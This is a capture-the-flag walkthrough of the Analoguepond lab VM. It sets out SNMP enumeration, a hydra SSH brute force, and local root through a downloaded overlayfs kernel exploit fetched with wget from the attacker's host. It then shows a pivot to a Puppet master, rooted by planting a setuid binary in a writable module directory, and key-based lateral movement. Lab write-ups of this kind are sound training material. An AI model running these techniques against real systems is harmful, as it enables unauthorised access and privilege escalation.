Created
July 30, 2017 20:38
Analoguepond 1 Walkthrough
IP: 192.168.43.254 | |
nmap 192.168.43.254 -A | |
port 22 was open | |
nmap 192.168.43.254 -sU -v | |
port 22 | |
port 161 udp | |
192.168.43.254 -sU -sS -v | |
PORT STATE SERVICE | |
161/udp open snmp | |
MAC Address: 08:00:27:C9:D4:07 (Oracle VirtualBox virtual NIC) | |
snmpwalk -c public 192.168.43.254 -v 1 | |
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64" | |
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 | |
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95 | |
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>" | |
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond" | |
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..." | |
iso.3.6.1.2.1.1.7.0 = INTEGER: 72 | |
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 | |
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 | |
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49 | |
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4 | |
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 | |
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1 | |
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 | |
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 | |
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching." | |
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model." | |
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB." | |
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" | |
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations" | |
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations" | |
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" | |
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP." | |
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." | |
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." | |
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27 | |
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00 | |
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 | |
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro | |
" | |
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 | |
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26 | |
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 | |
End of MIB | |
snmpwalk -c public 192.168.43.254 -v 1 | |
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64" | |
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 | |
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95 | |
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>" | |
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond" | |
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..." | |
iso.3.6.1.2.1.1.7.0 = INTEGER: 72 | |
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 | |
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 | |
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49 | |
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4 | |
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 | |
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1 | |
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 | |
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 | |
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching." | |
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model." | |
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB." | |
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" | |
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations" | |
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations" | |
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" | |
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP." | |
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." | |
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." | |
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27 | |
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00 | |
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 | |
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro | |
" | |
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 | |
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26 | |
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 | |
enum4linux -U 192.168.43.254 | |
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 23 02:56:13 2017 | |
========================== | |
| Target Information | | |
========================== | |
Target ........... 192.168.43.254 | |
RID Range ........ 500-550,1000-1050 | |
Username ......... '' | |
Password ......... '' | |
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none | |
====================================================== | |
| Enumerating Workgroup/Domain on 192.168.43.254 | | |
====================================================== | |
[E] Can't find workgroup/domain | |
======================================= | |
| Session Check on 192.168.43.254 | | |
======================================= | |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. | |
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. | |
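The SNMP walk (readable with the default community string "public") gave a contact name and a location string, so Google the location string: "There is a house in New Orleans..."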
cewl http://www.azlyrics.com/lyrics/bobdylan/houseoftherisinsun.html > /root/Desktop/analougepnd/profile.txt | |
My IP was blocked when I tried again, so I copied the lyrics, hosted them as profiler.php on my own Apache server, and then ran cewl against that page to build the wordlist for the SSH hydra run.
cewl -d 2 -m 6 -w /root/Desktop/analougepnd/profile.txt http://192.168.43.95/profiler.php | |
After adding some more words/usernames obtained from the SNMP enumeration, it's hydra time, but a manual brute force may also work.
hydra -e nsr -L /root/Desktop/analougepnd/profile.txt -P /root/Desktop/analougepnd/profile.txt 192.168.43.254 ssh | |
[22][ssh] host: 192.168.43.254 login: eric password: therisingsun | |
ssh eric@192.168.43.254 | |
therisingsun | |
id | |
uid=1000(eric) gid=1000(eric) groups=1000(eric),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare) | |
uname -a | |
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux | |
pwd | |
/home/eric | |
ls | |
reticulatingsplines.gif | |
file reticulatingsplines.gif | |
reticulatingsplines.gif: GIF image data, version 89a, 382 x 359 | |
scp reticulatingsplines.gif root@192.168.43.95:/root/Desktop/analougepond | |
A Joke | |
Privilege Escalation | |
The overlayfs exploit worked.
https://www.exploit-db.com/exploits/39166/ | |
Download it | |
Compile and copy it in /var/www/html | |
wget http://192.168.43.95/39166 | |
chmod 777 39166 | |
./39166 | |
eric@analoguepond:~$ ./39166 | |
root@analoguepond:~# | |
id | |
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric) | |
ls | |
flag.txt | |
cat flag.txt | |
C'Mon Man! Y'all didn't think this was the final flag so soon...? | |
Did the bright lights and big city knock you out...? If you pull | |
a stunt like this again, I'll send you back to Walker... | |
This is obviously troll flah #1 So keep going. | |
Troll Flag | |
ifconfig | |
eth0 Link encap:Ethernet HWaddr 08:00:27:c9:d4:07 | |
inet addr:192.168.43.254 Bcast:192.168.43.255 Mask:255.255.255.0 | |
inet6 addr: fe80::a00:27ff:fec9:d407/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:47685 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:49456 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:1000 | |
RX bytes:4655624 (4.6 MB) TX bytes:8767032 (8.7 MB) | |
lo Link encap:Local Loopback | |
inet addr:127.0.0.1 Mask:255.0.0.0 | |
inet6 addr: ::1/128 Scope:Host | |
UP LOOPBACK RUNNING MTU:65536 Metric:1 | |
RX packets:4 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:0 | |
RX bytes:372 (372.0 B) TX bytes:372 (372.0 B) | |
virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25 | |
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:636 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:606 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:0 | |
RX bytes:38700 (38.7 KB) TX bytes:48160 (48.1 KB) | |
vnet0 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7 | |
inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:2207 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:8181 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:500 | |
RX bytes:982112 (982.1 KB) TX bytes:1388441 (1.3 MB) | |
vnet1 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a | |
inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:2167 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:7382 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:500 | |
RX bytes:1064317 (1.0 MB) TX bytes:1249030 (1.2 MB) | |
iptables -L | |
Chain INPUT (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT udp -- anywhere anywhere udp dpt:domain | |
ACCEPT tcp -- anywhere anywhere tcp dpt:domain | |
ACCEPT udp -- anywhere anywhere udp dpt:bootps | |
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps | |
Chain FORWARD (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED | |
ACCEPT all -- 192.168.122.0/24 anywhere | |
ACCEPT all -- anywhere anywhere | |
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable | |
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable | |
Chain OUTPUT (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT udp -- anywhere anywhere udp dpt:bootpc | |
arp -n | |
Address HWtype HWaddress Flags Mask Iface | |
192.168.43.67 ether 08:00:27:4d:1b:bb C eth0 | |
192.168.43.95 ether 08:00:27:4d:1b:bb C eth0 | |
192.168.122.3 ether 52:54:00:6d:93:6a C virbr0 | |
192.168.122.2 ether 52:54:00:5b:05:f7 C virbr0 | |
192.168.43.185 ether 9c:ad:97:ce:5d:21 C eth0 | |
192.168.43.1 ether 00:27:15:44:59:47 C eth0 | |
arp -a | |
? (192.168.43.67) at 08:00:27:4d:1b:bb [ether] on eth0 | |
kali (192.168.43.95) at 08:00:27:4d:1b:bb [ether] on eth0 | |
barringsbank.example.com (192.168.122.3) at 52:54:00:6d:93:6a [ether] on virbr0 | |
puppet.example.com (192.168.122.2) at 52:54:00:5b:05:f7 [ether] on virbr0 | |
hulk (192.168.43.185) at 9c:ad:97:ce:5d:21 [ether] on eth0 | |
? (192.168.43.1) at 00:27:15:44:59:47 [ether] on eth0 | |
ssh root@192.168.122.3 | |
ssh_exchange_identification: read: Connection reset by peer | |
root@analoguepond:/root# ssh root@192.168.122.2 | |
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established. | |
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5. | |
Are you sure you want to continue connecting (yes/no)? yes | |
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts. | |
+-----------------------------------------------------------------------------+ | |
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her | | |
| most famous song | | |
+-----------------------------------------------------------------------------+ | |
root@192.168.122.2's password: | |
https://en.wikipedia.org/wiki/Sandie_Shaw | |
Sandie Shaw, MBE (born Sandra Ann Goodrich; 26 February 1947) is an English singer. One of the most successful British female singers of the 1960s, in 1967 the song "Puppet on a String" performed by her became the first British entry to win the Eurovision Song Contest. After a long and successful career, Shaw announced her retirement from the music industry in 2013 | |
ssh sandieshaw@192.168.122.2 | |
puppetonastring | |
ps aux | grep puppet | |
puppet 976 1.4 5.9 449568 60348 ? Ssl 07:26 3:09 /usr/bin/ruby /usr/bin/puppet master | |
root 7269 0.1 0.0 4448 848 ? Ss 11:10 0:00 /bin/sh -c /usr/bin/puppet agent --test > /dev/null 2>&1 | |
root 7270 53.2 5.0 286100 50876 ? Sl 11:10 0:36 /usr/bin/ruby /usr/bin/puppet agent --test | |
root 7474 0.0 4.5 287024 46312 ? Rl 11:11 0:00 /usr/bin/ruby /usr/bin/puppet agent --test | |
sandies+ 7478 0.0 0.2 11756 2148 pts/0 S+ 11:11 0:00 grep puppet | |
cd /etc/puppet | |
ls | |
auth.conf etckeeper-commit-post files manifests puppet.conf | |
environments etckeeper-commit-pre fileserver.conf modules templates | |
cd manifests/ | |
ls | |
environments.conf nodes.pp site.pp | |
cat environments.conf | |
manifest = $confdir/manifests/site.pp | |
manifestdir = $confdir/manifests | |
modulepath = $confdir/modules | |
sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp | |
node 'default' { | |
include vulnhub | |
} | |
node 'puppet.example.com' inherits 'default' { | |
include wiggle | |
} | |
node 'barringsbank.example.com' inherits 'default' { | |
} | |
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp | |
node 'default' { | |
include vulnhub | |
} | |
node 'puppet.example.com' inherits 'default' { | |
include wiggle | |
} | |
node 'barringsbank.example.com' inherits 'default' { | |
include fiveeights | |
} | |
sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp | |
## Module to unwind changed #vulnhub people make. This will unwind the most | |
## common vectors they used to get at my other VMs | |
class vulnhub { | |
## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh) | |
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional", | |
"ncat", "netdiscover", "lftp" ] | |
package { $purge: | |
ensure => purged, | |
} | |
## The encryption is still primative Egyptian (Hello drweb) | |
$theresas_nightmare = [ "cryptcat", "socat" ] | |
package { $theresas_nightmare: | |
ensure => present, | |
} | |
## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub) | |
file { "/etc/sudoers.d": | |
ensure => "directory", | |
recurse => true, | |
purge => true, | |
force => true, | |
owner => root, | |
group => root, | |
mode => 0755, | |
source => "puppet:///modules/vulnhub/sudoers.d", | |
} | |
## revert /etc/passwd (Hey rfc, kevinnz!) | |
file {'/etc/sudoers': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0440, | |
source => "puppet:///modules/vulnhub/sudoers", | |
} | |
## revert /etc/passwd (Hey Rasta_Mouse!) | |
file {'/etc/passwd': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-passwd", | |
} | |
## and /etc/group (Hello to you cmaddy) | |
file {'/etc/group': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-group", | |
} | |
## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!) | |
file {'/etc/ssh/ssd_config': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-sshd_config", | |
notify => Service["ssh"], | |
} | |
## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like | |
## Gibson | |
cron { "puppet check in": | |
command => "/usr/bin/puppet agent --test > /dev/null 2>&1", | |
user => "root", | |
minute => "*/10", | |
ensure => present, | |
} | |
## Everyone forbidden by default (Hey wrboyce, rasta_mouse, 8bitkiwi) | |
file {'/etc/hosts.deny': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/hosts.deny", | |
} | |
## Firewall off to only specific hosts (Hello Bas!) | |
file {'/etc/hosts.allow': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-hosts.allow", | |
} | |
## Don't fill up the disk (Hey GlobalMaquereau, g0bl1n) | |
tidy { "/var/lib/puppet/reports": | |
age => "1h", | |
recurse => true, | |
} | |
## Changing openssh config requires restart | |
service { 'ssh': | |
ensure => running, | |
enable => true, | |
hasstatus => true, | |
hasrestart => true, | |
} | |
} | |
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c | |
#include <stdio.h> | |
#include <unistd.h> | |
/*
 * Draw the next frame of a one-character text spinner on stdout.
 *
 * Each call writes one of '/', '-', '\', '|' followed by a carriage
 * return, flushes stdout, and then steps to the next frame, wrapping
 * after the fourth.  The frame index lives in a function-local static,
 * so the position carries over from one call to the next.
 */
void
advance_spinner() {
    static const char frames[4] = { '/', '-', '\\', '|' };
    static int idx = 0;
    const int frame_count = (int)(sizeof frames / sizeof frames[0]);

    /* Same bytes as printf("%c\r", ...): the frame, then a carriage return. */
    putchar(frames[idx]);
    putchar('\r');
    fflush(stdout);

    idx++;
    if (idx == frame_count) {
        idx = 0;
    }
}
/*
 * Entry point of the spinner: redraw the spinner forever, pausing
 * 300 microseconds (usleep) between frames.  The loop has no exit
 * condition, so the trailing return is never reached.
 */
int
main() {
    for (;;) {
        advance_spinner();
        usleep(300);
    }
    return 0;
}
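We need to get root on the puppet host, where we are logged in as sandieshaw.
Puppet copies spin to /tmp with root privileges.
There is no C compiler on this host, so we compile on our own machine or on eric's machine and scp the binary to sandieshaw's host, into the directory /etc/puppet/modules/wiggle/files.
Then we wait for puppet to copy spin to /tmp.
Once it is copied, run ./spin and we are root. This works only because an unprivileged user can write to a module directory whose contents the root-run puppet agent then installs setuid root; the module tree on a Puppet master should be writable by root alone.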
./spin | |
# id | |
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw) | |
whoami | |
root | |
cd /root | |
# ls | |
protovision | |
# cd protovision | |
# ls | |
flag1.txt.0xff jim melvin | |
# cat flag1.txt.0xff | |
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e33636842 | |
48496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d | |
79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e | |
585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264 | |
763032626a35535a6956486431395765756333643339794c364d486330524861 | |
# cat jim | |
Mr Potato Head! Backdoors are not a... | |
# cat melvin | |
Boy you guys are dumb! I got this all figured out... | |
http://www.convertstring.com/EncodeDecode/HexDecode | |
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyA | |
SbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02b | |
j5SZiVHd19Weuc3d39yL6MHc0RHa | |
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dG | |
VzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg== | |
echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dGVzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==' | base64 -d | |
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something... | |
Mr Potato Head! Backdoors are not a... Secret | |
Boy you guys are dumb! I got this all figured out... Maize | |
la -alh | |
.I_have_you_now | |
cd .I_have_you_now | |
ls -alh | |
a | |
grauniad_1995-02-27.jpeg | |
scp grauniad_1995-02-27.jpeg root@192.168.43.95:/root/Desktop/ | |
cd /root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z | |
ls -alh | |
my_world_you_are_persistent_try | |
nleeson_key.gpg | |
cat my_world_you_are_persistent_try | |
joshua | |
I was having some issues decrypting the gpg file on the target, so I copied it to my Kali machine.
gpg nleeson_key.gpg | |
gpg: CAST5 encrypted data | |
gpg: gpg-agent is not available in this session | |
gpg: encrypted with 1 passphrase | |
gpg: error creating `nleeson_key': Permission denied | |
gpg: WARNING: message was not integrity protected | |
gpg nleeson_key.gpg | |
gpg nleeson_key.gpg | |
gpg: keybox '/root/.gnupg/pubring.kbx' created | |
gpg: WARNING: no command supplied. Trying to guess what you mean ... | |
gpg: CAST5 encrypted data | |
gpg: encrypted with 1 passphrase | |
gpg: WARNING: message was not integrity protected | |
root@kali:~/Desktop/analougepnd# cat nleeson_key | |
-----BEGIN RSA PRIVATE KEY----- | |
Proc-Type: 4,ENCRYPTED | |
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16 | |
RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8 | |
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK | |
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6 | |
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8 | |
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD | |
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9 | |
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy | |
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37 | |
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM | |
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO | |
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym | |
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ | |
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e | |
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE | |
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg | |
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4 | |
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2 | |
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP | |
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC | |
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO | |
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb | |
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB | |
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT | |
fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx | |
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB | |
-----END RSA PRIVATE KEY----- | |
export TERM=xterm | |
chmod 777 nleeson_key | |
ssh -i nleeson_key nleeson@192.168.122.3 | |
joshua | |
nleeson@barringsbank:~$ id | |
uid=1000(nleeson) gid=1000(nleeson) groups=1000(nleeson),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare) | |
nleeson@barringsbank:~$ ls | |
